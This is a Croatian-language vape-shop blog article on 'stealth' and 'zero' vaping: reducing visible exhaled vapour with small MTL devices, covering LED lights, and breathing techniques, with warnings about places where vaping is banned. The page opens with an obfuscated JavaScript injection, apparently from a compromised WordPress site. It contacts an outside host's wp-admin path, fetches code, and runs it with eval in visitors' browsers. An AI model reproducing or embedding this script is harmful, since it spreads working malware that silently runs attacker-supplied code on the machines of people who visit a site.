;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Kako pariti na javnim mjestima te smanjiti količinu izdahnute pare

Nije neobično da se ljudi na javnim mjestima zgražaju kada vide vapere koji izbacuju oblake pare i moramo se složiti da takav način parenja ponekad zaista nije idealan, posebno u zatvorenim prostorima. Ipak, postoje načini da se količina izdahnute pare smanji, a danas ćemo govoriti o stealth vapingu kao načinu parenja u zatvorenom.

Što je takozvani Stealth Vaping?

Stealth vaping je korištenje e-cigarete na diskretan način. Koristeći male uređaje koji stvaraju manje oblake pare, korisnik može regulirati izdisaj te učiniti da izdahnuta para bude jedva vidljiva. Ovaj oblik vapinga najbolje funkcionira s uređajima koji se mogu sakriti i koji imaju nisku snagu te usko MTL uvlačenje.

Stealth vaping je ono što radite kada ne želite privući neželjenu pozornost na sebe. Međutim, on još uvijek može proizvesti vidljivu paru te svakako ne preporučamo koristiti e-cigarete u prostorima gdje je vaping zabranjen. Često se pojavljuju novi zakoni koji vaping u javnim prostorima svrstavaju u istu kategoriju kao i pušenje cigareta, a neka mjesta koja zabranjuju vaping – poput zrakoplova – mogla bi vas dovesti u velike probleme sa zakonom ako vas uhvate.

Uobičajena mjesta gdje je vaping zabranjen:

  • Zrakoplovi
  • Javni prijevoz
  • Kazališta
  • Bolnice
  • Škole
  • Državne institucije

Pravila se mogu razlikovati od mjesta do mjesta. Općenito, najlakši pokazatelj je potražiti znakove “zabranjeno pušenje”. Ukoliko niste sigurni je li vaping na nekom mjestu zabranjen, svakako provjerite prije nego odlučite pariti na svoju ruku.

Kako diskretno koristiti e-cigaretu?

Nije svaki uređaj namijenjen za stealth vaping te će ovo biti veoma teško ili čak nemoguće izvesti na snažnom modu s DL atomizerom. Evo par osnovnih koraka koji će vam pomoći da parite na diskretan način:

Prvi korak: nabavite mali M2L uređaj poput POD-a, jednokratnog vape uređaja ili M2l atomizera ukoliko ste korisnik moda. Kada govorimo o POD-ovima i jednokratnim e-cigaretama,  oni dolaze u raznim malim oblicima i često izgledaju kao mali upaljači, flash diskovi ili čak privjesci za ključeve. I kao pravilo, što je uređaj manji, to će manje pare ispuštati.

Drugi korak: Pokrijte LED svjetla ukoliko ne želite da itko primijeti da je uređaj u vašoj ruci zapravo e-cigareta. Većina ultraprijenosnih kompleta za vape ima malo LED svjetlo koje se pali prilikom uvlačenja.

Treći korak: Uzimajte kratke udahe do nekoliko sekundi. Što duže uvlačite, oblak će biti veći. Iako mali uređaji ne ispuštaju puno pare, dugi udah izbacit će više pare od kratkog, logično. Prilikom izdisanja, najbolje je napućiti usne i otpuhati paru prema dolje i dalje od promatrača. Zapamtite, stealth vaping je diskretan, nije nevidljiv.

Ipak postoji i način parenja prilikom kojeg korisnik uopće ne izdiše paru, a to je takozvani Zero Vaping.

Što je Zero Vaping?

Zero vaping je vrsta stealth vapinga gdje korisnik udiše paru, ali je ne izdiše na normalan način. To je kao da svoj vape uređaj pretvarate u nikotinski inhalator, ovaj način vapinga trebalo bi isprobati samo s uređajima koji su mali i mogu se sakriti. Pokušati ovo na većem i snažnijem uređaju kao što je subomski atomizer vjerojatno će rezultirati neugodnim napadajem kašlja.

Ipak, kao i svi oblici vapinga, ni ovaj ne preporučamo tamo gdje je vaping zabranjen. Iako se neće vidjeti da para izlazi iz usta, buka aktiviranja zavojnice potencijalno bi mogla privući pozornost.

Stealth vaping je jednostavan. Za nulto zero potrebna je praksa. Ovdje će biti malo zadržavanja daha. To će promijeniti vašu uobičajenu tehniku parenja i udisanja, a možda će trebati neko vrijeme da se naviknete.

Postoje dva načina kako ovo izvesti i najbolje ih je koristiti s kompletima za početnike. Oba zahtjevaju udah od samo nekoliko sekundi, ali oni koji pokušavaju prvi put trebali bi pokušati sa što kraćim udasima. Također oba počinju kao MTL gdje se para prvo na trenutak zadrži u ustima prije nego što ode u pluća.

Višestruki kratki udisaji: Povucite malo pare. Umjesto da odmah izdahnete, ponovno brzo udahnite malo zraka na usta i nos. Još uvijek ne izdišući. Ponovite ovo još jednom ili dva puta. Trebali biste osjetiti kako vam se prsa šire kako ulazi više zraka. Zadržite dah još koju sekundu ako možete, a zatim izdahnite stisnutih usana.

Jedan duboki udah: Povucite malo pare u usta, a zatim u dugom i dubokom udisaju koji traje oko tri do pet sekundi tu paru udahnute iz usta u pluća. Izdahnite polako i namjerno stisnutih usana.

Ako vam para još uvijek izlazi iz usta, pokušajte s kraćim udarcem, duljim zadržavanjem daha ili dubljim udisajem.

Ako vam je razina nikotina previsoka i ne sviđa vam se osjećaj, prestanite pokušavati. Nastavite s uobičajenim načinima vapinga. Vaping bi korisniku uvijek trebao biti ugodan stoga ukoliko vam ovaj način ne odgovara, nema potrebe da ovo radite na silu.

Choose your Reaction!
Leave a Comment